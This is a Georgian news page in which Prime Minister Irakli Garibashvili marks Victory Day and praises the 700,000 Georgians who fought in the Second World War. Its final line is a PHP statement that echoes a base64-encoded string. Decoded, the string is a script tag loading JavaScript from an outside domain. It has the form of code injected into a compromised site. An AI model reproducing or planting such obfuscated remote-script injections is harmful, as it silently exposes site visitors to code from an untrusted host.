celsiusi
ავერსი შნაიდერი

700 000 ქართველი მონაწილეობდა მეორე მსოფლიო ომში. აქედან ნახევარზე მეტი გმირულად შეეწირა იდეას, რასაც ერქვა ბოროტების დამარცხება და ფაშიზმზე გამარჯვება, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა ჟურნალისტებს „ვეტერანთა კულტურისა და დასვენების პარკში“ განუცხადა, სადაც მეორე მსოფლიო ომში დაღუპულთა ხსოვნას პატივს მიაგო.

მთავრობის მეთაურმა ომის ვეტერანებს ფაშიზმზე გამარჯვების დღე მიულოცა.

„მინდა, ჩვენს გმირ ვეტერანებს მივულოცო დღევანდელი დღე. მინდა, ამ დიდი ბოროტების, ფაშიზმის დამარცხებისა და ჩვენი გამარჯვების დღე მივულოცო ჩვენს ვეტერანებს. მინდა აღვნიშნო, რომ ჩვენი ქვეყნის,  ჩვენი ქართველების, ჩვენი ხალხის როლი ამ დიდი სამამულო ომის გამარჯვებაში არის უდავოდ შეუფასებელი. თქვენ აღნიშნეთ, რომ 700 000 ქართველი მონაწილეობდა ამ ომში. აქედან ნახევარზე მეტი გმირულად შეეწირა ამ იდეას, რასაც ერქვა ბოროტების დამარცხება და ფაშიზმზე გამარჯვება. ამიტომ, კიდევ ერთხელ ქედს ვიხრი ჩვენი გმირი ქართველების ხსოვნის წინაშე და ჩვენს გმირ ვეტერანებს მინდა, რომ კიდევ ერთხელ მადლობა გადავუხადო ჩვენი მთავრობის სახელით ყველაფრისთვის“, – განაცხადა ირაკლი ღარიბაშვილმა. 

268
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");